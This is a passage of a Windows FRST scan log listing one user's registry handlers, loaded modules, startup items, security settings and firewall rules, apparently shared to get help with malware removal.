CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{62634D95-960B-4834-8E71-A70408AD8FD9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{84EB3779-151B-4C71-AEF0-A0FEE9481401}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\psuser_64.dll (Google Inc -> Google LLC)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{86508D42-E5D7-4D10-9C6F-D427AEEB85B5}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.34.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A804CF1A-91E5-4F0C-9E8C-DB39E74056DD}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.23\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\psuser_64.dll (Google Inc -> Google LLC)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EA724FD3-844D-43A9-A8C9-A5BC35FC20E4}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EF076C91-DC9E-43E3-84ED-3D219E065A4F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.302\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\FileSyncApi64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_05.dll -> No File
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [DivXShellExtensionItem] -> {48A8A3B0-57E8-4F2B-A49D-19E02B92377B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [DivXShellExtensionItem64] -> {6B49A276-0DBA-43F4-BC96-A841AD11B40B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => c:\program files (x86)\real\realplayer\RPDS\Bin64\rpcloudview.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
ContextMenuHandlers4: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2012-03-19] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers6: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
 
==================== Codecs (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Drivers32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32-x32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32: [vidc.DIVX] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32: [vidc.yv12] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32-x32: [VIDC.LAGS] => lagarith.dll
HKLM\...\Drivers32: [vidc.XVID] => C:\Windows\SysWOW64\xvidvfw.dll [179200 2009-01-25] () [File not signed]
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\Users\Vladana\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Profile 1"
 
==================== Loaded Modules (Whitelisted) =============
 
2013-05-18 17:25 - 2013-05-18 17:25 - 001350656 _____ ( ) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNGadgetClass\10d2c6adb5906a1d7bbeb75d2a713c07\PFNGadgetClass.ni.dll
2017-09-02 13:47 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2017-09-02 13:47 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2018-06-05 02:08 - 2014-05-19 16:19 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSCreateVC.dll
2018-06-05 02:08 - 2014-10-31 15:40 - 001498112 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\DAQExp.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000113664 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Tasks.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000139776 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Utility.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000758784 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Core.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 001778688 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Ctrls.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000046080 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Localization.dll
2011-12-16 15:37 - 2011-12-16 15:37 - 002437632 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNCommon.dll
2011-12-16 15:38 - 2011-12-16 15:38 - 002246144 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNDevice.dll
2011-12-22 09:03 - 2011-12-22 09:03 - 002281984 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNWLAN.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000421888 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNLocSet\b7cc59ff84258f2c78492c7ef6c33d6e\PFNLocSet.ni.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000473088 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNSwData\9a909070ecd70366e5c577eb52b4bbda\PFNSwData.ni.dll
2012-03-08 12:17 - 2012-03-08 12:17 - 000333312 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\BTHSSupplicant.dll
2012-03-01 10:52 - 2012-03-01 10:52 - 000105472 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\UsR3IoPort.dll
2012-03-29 06:37 - 2012-03-29 06:37 - 000498176 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\P2PSupplicant.dll
2012-04-17 18:35 - 2012-04-17 18:35 - 000168448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\PsRegApi.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000284160 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\TraceApi.dll
2012-04-17 18:36 - 2012-04-17 18:36 - 003280896 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\AmtWsMan.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000102400 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\DbEngine.dll
2012-04-17 18:38 - 2012-04-17 18:38 - 000104448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IntStngs.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000054272 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL
2012-04-17 18:46 - 2012-04-17 18:46 - 000545792 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\MurocApi.dll
2012-04-17 18:50 - 2012-04-17 18:50 - 000324608 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\panihvint.dll
2012-04-17 18:43 - 2012-04-17 18:43 - 001051136 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\PfMgrApi.dll
2012-04-17 18:51 - 2012-04-17 18:51 - 000178176 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\Ps7ZCfgS.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000020992 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\S24MUDLL.dll
2012-04-17 18:45 - 2012-04-17 18:45 - 002463744 _____ (Intel® Corporation) [File not signed] C:\Windows\System32\IWMSSvc.dll
2006-10-26 13:44 - 2006-10-26 13:44 - 000123904 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\csm.dll
2006-10-26 13:45 - 2006-10-26 13:45 - 000247296 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\msdbg2.dll
2012-04-17 17:52 - 2012-04-17 17:52 - 001830912 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2017-09-02 13:47 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
2018-06-05 02:08 - 2014-10-31 15:41 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSProducstInfo.dll
 
==================== Alternate Data Streams (Whitelisted) ========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:94A19129 [260]
 
==================== Safe Mode (Whitelisted) ==================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) =================
 
==================== Internet Explorer trusted/restricted ==========
 
==================== Hosts content: =========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2019-11-09 17:42 - 2019-11-18 19:26 - 000000822 _____ C:\Windows\system32\drivers\etc\hosts
 
==================== Other Areas ===========================
 
(Currently there is no automatic fix for this section.)
 
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Program Files (x86)\PC Connectivity Solution\;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x86;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x64;C:\Program Files\Intel\Intel® Management Engine Components\DAL;C:\Program Files\Intel\Intel® Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files (x86)\QuickTime\QTSystem\
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 0) (EnableLUA: 0)
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(If an entry is included in the fixlist, it will be removed.)
 
MSCONFIG\Services: BstHdAndroidSvc => 2
MSCONFIG\Services: BstHdLogRotatorSvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: RealPlayer Cloud Service => 2
MSCONFIG\Services: RealPlayerUpdateSvc => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^RealPlayer Cloud Service UI.lnk => C:\Windows\pss\RealPlayer Cloud Service UI.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Vladana^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^ZenMate.bat => C:\Windows\pss\ZenMate.bat.Startup
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: DivXMediaServer => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
MSCONFIG\startupreg: DivXUpdate => "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
MSCONFIG\startupreg: Google Update => "C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: NSU_agent => "C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe"
MSCONFIG\startupreg: PC Suite Tray => "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RealDownloader => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
MSCONFIG\startupreg: Spotify Web Helper => C:\Users\Vladana\AppData\Roaming\Spotify\SpotifyWebHelper.exe --autostart
MSCONFIG\startupreg: TkBellExe => "c:\program files (x86)\real\realplayer\Update\realsched.exe" -osboot
MSCONFIG\startupreg: Wondershare Helper Compact.exe => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
 
==================== FirewallRules (Whitelisted) ================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{418A7595-F489-448D-A132-2A9519236EF0}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel Corporation-Mobile Wireless Group -> )
FirewallRules: [{B0E6337C-DD13-46CD-A572-58359114E70E}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{5B4B9E35-FBA6-4F36-8798-35D35E29E74B}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{B1CC60A0-4651-4E6D-A4FA-32240C388099}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{A0A9A6FA-AE67-4AB9-B612-32D06F124746}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{CE426DDA-632D-4252-8AF5-B3999BF81124}] => (Allow) C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{CDC85982-754B-4DE3-977B-6E479A26C388}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{F565ACF8-37C4-4665-A110-386DCCDF81E9}] => (Allow) LPort=2869
FirewallRules: [{BA538C52-47F4-4638-88FB-D4E100881E6A}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{838DFD5B-BE28-4A8A-9D48-591EFEF35AB6}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [UDP Query User{7BCDD032-7F97-4FE8-ADB0-130474CDDD9F}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [{DAA4242B-32CB-43E0-B514-40A492583C52}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{87CC937C-627E-4461-A86D-A01FA1D52711}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{787EA532-6389-4D57-8CB4-56ED49F60E38}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [{F0F6824E-F9E8-401C-92A1-52EE1D31841E}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [TCP Query User{BE9D298D-4B00-4F7D-AA02-CE4B8C269C09}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [UDP Query User{010D4FEB-5458-4625-B346-3F087D27F4A3}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [TCP Query User{DF4734DC-C765-4167-986C-24CF01DB1137}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [UDP Query User{E878D949-B0E7-411A-8F5A-335EE806B7C2}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C1202602-2671-439A-8CF4-FFA06CC539FB}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [UDP Query User{3F9714B5-446C-4FD2-91A7-085A9AAF37D8}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [TCP Query User{813FD61F-108E-4C8F-8713-5C5C65A07F20}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{94D1C3B8-E5D6-406D-8550-D0FB1A8AFD18}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{EBCB1A48-8CAD-40A0-97C9-A5E7D1969006}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [UDP Query User{51B1713E-C3DC-4E9B-8B2E-299D5D7EB37D}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [{AD675AD4-8A27-4858-B7BF-64062E576C45}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{FF4764D4-F4A6-4C99-B73E-53F8DE61E6F9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{61F7EE47-9BA9-4D47-ADB6-5E48B1DF1F11}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [TCP Query User{9DA426E5-870A-46BA-ACD6-3BECCA6D3981}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{E35C77F8-2476-4F58-B62F-633DD6DA4D7B}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{64ADE5CF-E0E0-432A-ADCA-107CEF11A830}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{29E89790-5F1F-403F-9200-85040488F6BF}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{051C8ED1-8257-4C07-9843-3A321CB1D2B5}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{11E9C41A-BB10-4AE0-86A2-D113F4631726}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{1028E6BB-11FD-426E-9846-980F150B8359}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
FirewallRules: [UDP Query User{131B9741-3987-48AB-97A9-8EB722A5AD2D}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
